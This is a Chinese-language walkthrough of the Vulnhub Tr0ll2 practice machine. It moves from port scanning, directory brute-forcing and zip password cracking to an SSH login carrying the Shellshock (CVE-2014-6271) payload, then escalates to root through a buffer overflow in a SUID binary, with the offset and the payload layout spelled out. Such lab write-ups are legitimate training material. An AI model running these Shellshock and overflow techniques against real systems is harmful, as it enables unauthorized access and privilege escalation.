当前位置 : 主页 > 编程语言 > c语言 >

渗透专题丨Vulnhub-Tr0ll2靶机打靶

来源:互联网 收集:自由互联 发布时间:2023-08-28
确认目标机IP:192.168.38.140 进行端口扫描: 查看一下版本: 没有查到关键信息,以80端口作为突破: 拿到提示信息: 接下来尝试ftp登录,根据提示信息: 登录之后,拿到lmao.zip文件 尝

确认目标机IP:192.168.38.140 1.png

进行端口扫描: 2.png

查看一下版本: 3.png

没有查到关键信息,以80端口作为突破: 4.png

拿到提示信息:

接下来尝试ftp登录,根据提示信息: 5.png

登录之后,拿到lmao.zip文件 6.png

尝试解压文件,需要密码: 7.png

接下来对网址进行扫描爆破: 8.png

打开robots.txt:

10.png

再次爆破: 11.png

找到可疑地址:http://192.168.38.140//ok_this_is_it 12.png

接下来下载照片,通过strings对图片进行分析:

13.png

没有关键信息,再找一个网址,同样的操作:http://192.168.38.140//dont_bother

14.png

深入此目录:

15.png

下载回来这个文件,通过base64解密: 16.png

使用此字典对lmao.zip进行爆破: 17.png

完事之后解压lmao.zip,生成noop,查看一下是一个私钥: 18.png

尝试链接ssh,链接失败: 19.png

这里利用了cve-2014-6271漏洞:

'() { :;};/bin/bash'

ssh -i noob noob@192.168.38.140 '() { :;};/bin/bash':

20.png

可以看到这里已经链接到: 21.png

查找高权限文件:

22.png

可以看到有root可疑文件,运行不同的root文件,发现需要传入参数,输入500个A,测试到door2中r00t会崩溃,是我们需要的,抠出来:

23.png

接下来用ida打开分析一下: 24.png

可以看到这是一个缓冲区溢出漏洞,生成随机字符串: 25.png

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq

又进行了一次链接,发现我们的文件已经更改了目录: 26.png

随后确认溢出点: 27.png

出现段错误,需要进行调试:

28.png

异常点位置确定: 29.png

也就是偏移268后+返回地址,首先是268个A+4个B进行测试: 30.png

可以看到eip已经成功被覆盖。接下来就是构造我们的payload。填充滑板指令,确定esp地址: 31.png

所以可以开始构造EXP,268+esp地址+16*0x90+shellcode:

32.png

可以看到,提权成功。 33.png 34.png

35.png

成功获取到flag:a70354f0258dcc00292c72aab3c8b1e4

上一篇:渗透专题丨Vulnhub-DC-1靶机打靶
下一篇:没有了
网友评论